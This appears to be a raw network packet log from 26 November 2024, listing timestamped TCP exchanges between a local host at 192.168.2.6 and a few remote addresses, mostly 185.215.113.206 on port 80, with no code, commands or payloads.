Nov 26, 2024 00:25:45.442745924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.442778111 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.443864107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.443964958 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.443991899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.444076061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.445013046 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.445076942 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.445148945 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.445213079 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.446190119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.446252108 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.446290970 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.446335077 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.447364092 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.447438002 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.447475910 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.447695017 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.448803902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.448815107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.448858023 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.448890924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.449803114 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.449822903 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.449848890 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.449882984 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.450905085 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.451004982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.451021910 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.451054096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.452095032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.452197075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.452208996 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.452240944 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.453217030 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.453274012 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.453403950 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.453484058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.454402924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.454462051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.454889059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.454950094 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.455792904 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.455806017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.455871105 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.456773996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.456825018 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.456947088 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.456994057 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.458002090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.458046913 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.458066940 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.458121061 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.459166050 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.459249973 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.459395885 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.459465981 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.460300922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.460370064 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.460376024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.460458994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.461483002 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.461570024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.461596966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.461654902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.462614059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.462675095 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.462728977 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.462785006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.463846922 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.463896990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.463931084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.463994980 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.464999914 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.465070963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.465133905 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.465312004 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.466156006 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.466202021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.466259956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.466312885 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.572479963 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.573036909 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.573054075 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.573554039 CET	49859	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.573559046 CET	443	49859	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.602174044 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.602284908 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.604455948 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.604511976 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.604512930 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.604665041 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.606760025 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.606837988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.606844902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.606911898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.607455969 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.607481956 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.607531071 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.607532024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.608226061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.608324051 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.608328104 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.608374119 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.609349966 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.609747887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.609817028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.610506058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.610589981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.610646963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.611716032 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.611879110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.611946106 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.612895012 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.612997055 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.613054037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.614069939 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.614238024 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.614304066 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.615200996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.615246058 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.615294933 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.616394997 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.616453886 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.616528988 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.616586924 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.617577076 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.617615938 CET	49854	443	192.168.2.6	20.199.58.43
Nov 26, 2024 00:25:45.617636919 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.617646933 CET	443	49854	20.199.58.43	192.168.2.6
Nov 26, 2024 00:25:45.617677927 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.617746115 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.618881941 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.618954897 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.618999958 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.619116068 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.619940996 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.620019913 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.620119095 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.620182037 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.621095896 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.621155977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.621231079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.621294975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.622277975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.622337103 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.622438908 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.622512102 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.623507023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.623560905 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.623594999 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.623651028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.624591112 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.624674082 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.624701023 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.624840975 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.625790119 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.625823021 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.625875950 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.627000093 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.627053022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.627068043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.627113104 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.628139019 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.628192902 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.628303051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.628355026 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.629302979 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.629359007 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.629420042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.629478931 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.630501986 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.630587101 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.630588055 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.630794048 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.631649017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.631719112 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.631789923 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.631901979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.632806063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.632863998 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.632941008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.633013010 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.634020090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.634074926 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.634110928 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.634200096 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.635201931 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.635256052 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.635260105 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.635328054 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.636352062 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.636476994 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.636492014 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.636534929 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.637567043 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.637631893 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.637696981 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.637797117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.638710022 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.638780117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.638783932 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.638854027 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.639910936 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.639986992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.640045881 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.641041994 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.641174078 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.641230106 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.642210007 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.642332077 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.642379045 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.643418074 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.643522024 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.643534899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.643577099 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.644625902 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.644692898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.644714117 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.644855976 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.645740986 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.645859957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.645864964 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.645914078 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.646962881 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.647022963 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.647062063 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.647104979 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.648119926 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.648195028 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.648277998 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.648354053 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.649275064 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.649338961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.649374008 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.649420977 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.650474072 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.650543928 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.650582075 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.650675058 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.651653051 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.651726961 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.651730061 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.651823044 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.652837992 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.652915001 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.652929068 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.653187990 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.654020071 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.654108047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.654113054 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.654206991 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.655186892 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.655268908 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.655309916 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.655355930 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.656452894 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.656508923 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.656598091 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.656661034 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.657529116 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.657583952 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.657628059 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.658709049 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.658771038 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.658778906 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.658812046 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.659840107 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.659925938 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.660001993 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.661024094 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.661108971 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.661127090 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.661200047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.662195921 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.662240982 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.662306070 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.662377119 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.663364887 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.663429022 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.663475037 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.663551092 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.664602041 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.664675951 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.664690018 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.664782047 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.665715933 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.665755033 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.665779114 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.665805101 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.666914940 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.666996956 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.667001963 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.667181015 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.668056965 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.668303013 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.715522051 CET	49872	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:45.715565920 CET	443	49872	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:45.715625048 CET	49872	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:45.716279984 CET	49873	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:45.716310978 CET	443	49873	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:45.716398954 CET	49873	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:45.716725111 CET	49872	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:45.716734886 CET	443	49872	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:45.716866016 CET	49873	443	192.168.2.6	23.209.72.32
Nov 26, 2024 00:25:45.716881037 CET	443	49873	23.209.72.32	192.168.2.6
Nov 26, 2024 00:25:45.738734007 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.739891052 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.739945889 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.740411997 CET	49860	443	192.168.2.6	13.107.246.63
Nov 26, 2024 00:25:45.740427017 CET	443	49860	13.107.246.63	192.168.2.6
Nov 26, 2024 00:25:45.808254957 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.808345079 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.808413029 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.808674097 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.808757067 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.808943987 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.809020042 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.809075117 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.810072899 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.810168982 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.810219049 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.811273098 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.811425924 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.811441898 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.811513901 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.812439919 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.812491894 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.812598944 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.812665939 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.813615084 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.813677073 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.813704967 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.813756943 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.814793110 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.814857006 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.814903975 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.814944983 CET	49795	80	192.168.2.6	185.215.113.206
Nov 26, 2024 00:25:45.815989017 CET	80	49795	185.215.113.206	192.168.2.6
Nov 26, 2024 00:25:45.816042900 CET	49795	80	192.168.2.6	185.215.113.206
